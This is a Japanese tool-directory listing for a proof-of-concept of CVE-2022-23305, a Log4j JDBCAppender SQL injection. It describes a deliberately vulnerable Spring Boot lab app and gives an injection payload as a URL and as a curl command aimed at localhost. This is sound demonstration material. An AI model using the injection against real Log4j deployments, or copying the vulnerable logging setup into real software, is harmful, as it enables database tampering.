Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-23305_POC — CVE-2022-23305 Log4J JDBCAppender SQl injection POC | Kitploit
ツール/GitHubGitHub/tkomlodi/cve-2022-23305_poc
脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育データベースセキュリティラボと実践
GitHubtkomlodi/cve-2022-23305_poc

CVE-2022-23305_POC

CVE-2022-23305 Log4J JDBCAppender SQl injection POC

リポジトリを見る
13年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-23305 Log4j JDBCAppender SQLインジェクション PoC

これは、CVE-2022-23305の脆弱性を示す非常にシンプルなSpring Bootベースのアプリケーションです。Apache Maven、Spring Boot、Spring MVC、およびH2インメモリデータベースを使用して、URLクエリ文字列パラメータとして取得した1つの単純なエントリをログに記録します。Log4JがJDBCAppenderを使用するように構成されているため、SQLインジェクションに対して脆弱です。

ログ記録のステートメントについては、src/main/java/poc/InjectionController.javaを参照してください。
すべての構成ファイルについては、src/main/resourceフォルダを参照してください。

JavaとMavenを使用してアプリケーションを実行するには、"mvn clean spring-boot:run"を実行します。
Dockerアプリケーションとして実行することもできます。例:
 docker build --tag log4j-poc .
 docker run -p 8080:8080 log4j-poc

アプリケーションは http://localhost:8080/ で利用可能です。
脆弱性を悪用するには、ログに記録されるパラメータとしてインジェクションされたSQLステートメントを送信します。
 "http://localhost:8080/?param=');insert into logs values(':("
戻り値は、追加されたログエントリをリストし、パラメータにインジェクションされたSQLによって追加されたエントリが含まれます。
curlを使用して同じことを行うには:
 curl 'http://localhost:8080/?param=%27);insert%20into%20logs%20values(%27:('

ツールをダウンロード